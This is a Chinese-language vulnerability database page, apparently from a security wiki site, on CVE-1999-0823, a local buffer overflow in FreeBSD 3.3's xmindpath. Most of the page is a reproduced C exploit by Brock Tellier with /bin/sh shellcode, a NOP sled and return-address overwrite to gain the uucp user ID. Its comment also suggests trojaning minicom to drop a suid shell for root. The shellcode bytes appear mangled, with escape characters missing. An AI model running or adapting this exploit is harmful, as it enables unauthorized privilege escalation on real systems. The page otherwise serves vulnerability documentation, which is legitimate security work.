FreeBSD xmindpath缓冲区溢出漏洞

FreeBSD xmindpath缓冲区溢出漏洞

漏洞ID 1105629 漏洞类型 缓冲区溢出
发布时间 1999-12-01 更新时间 2005-05-02
图片[1]-FreeBSD xmindpath缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0823
图片[2]-FreeBSD xmindpath缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199912-006
漏洞平台 FreeBSD CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19652
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-006
|漏洞详情
FreeBSDxmindpath存在缓冲区溢出漏洞。本地用户可以通过-f参数获得权限。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/839/info

The version of xmindpath shipped with FreeBSD 3.3 can be locally exploited via overrunning a buffer of predefined length. It is possible to gain the effective userid of uucp through this vulnerability. It may be possible, after attaining uucp priviliges, to modify binaries to which uucp has write access to and trojan them to further elevate priviliges), ie: modify minicom so that when root runs it, drops a suid shell somewhere. 
*/

/*
 *
 * FreeBSD 3.3 xmindpath exploit gives euid uucp
 * Compile: gcc -o xmindx xmindx.c
 * Usage: ./xmindx <offset>
 /path/to/mindpath -f $RET
 * Brock Tellier <[email protected]>
 *
 */
 
 #include <stdlib.h>
 #include <stdio.h>
 

 char shell[]= /* [email protected] */
 "xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
 "x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
 "x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
 "x9a>:)(:<xe8xc6xffxffxff/bin/sh";
 

 #define EGGLEN 2048
 #define RETLEN 279
 #define ALIGN 3
 #define NOP 0x90

 int main(int argc, char *argv[]) {
 

 long int offset=0;
 int i;
 int egglen = EGGLEN;
 int retlen = RETLEN;
 long int addr = 0xbfbfcfa8;
 char egg[EGGLEN];
 char ret[RETLEN];


 if (argc == 2) offset = atoi(argv[1]);


 addr=addr + offset;

 fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RETn");
 fprintf(stderr, "Brock Tellier [email protected]");
 fprintf(stderr, "Using addr: 0x%xn", addr);

 memset(egg,NOP,egglen);
 memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
  

 for(i=ALIGN;i< retlen;i+=4)
 *(int *)&ret[i]=addr;
 

 memcpy(egg, "EGG=", 4);
 putenv(egg);
 memcpy(ret,"RET=",4);
 putenv(ret);

 system("/usr/local/bin/bash");

 }
|参考资料

来源:BID
名称:839
链接:http://www.securityfocus.com/bid/839
来源:OSVDB
名称:1150
链接:http://www.osvdb.org/1150

相关推荐: Jabber Software Jabber Gadu-Gadu Transport Multiple Remote Denial Of Service Vulnerabilities

Jabber Software Jabber Gadu-Gadu Transport Multiple Remote Denial Of Service Vulnerabilities 漏洞ID 1098925 漏洞类型 Failure to Handle E…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享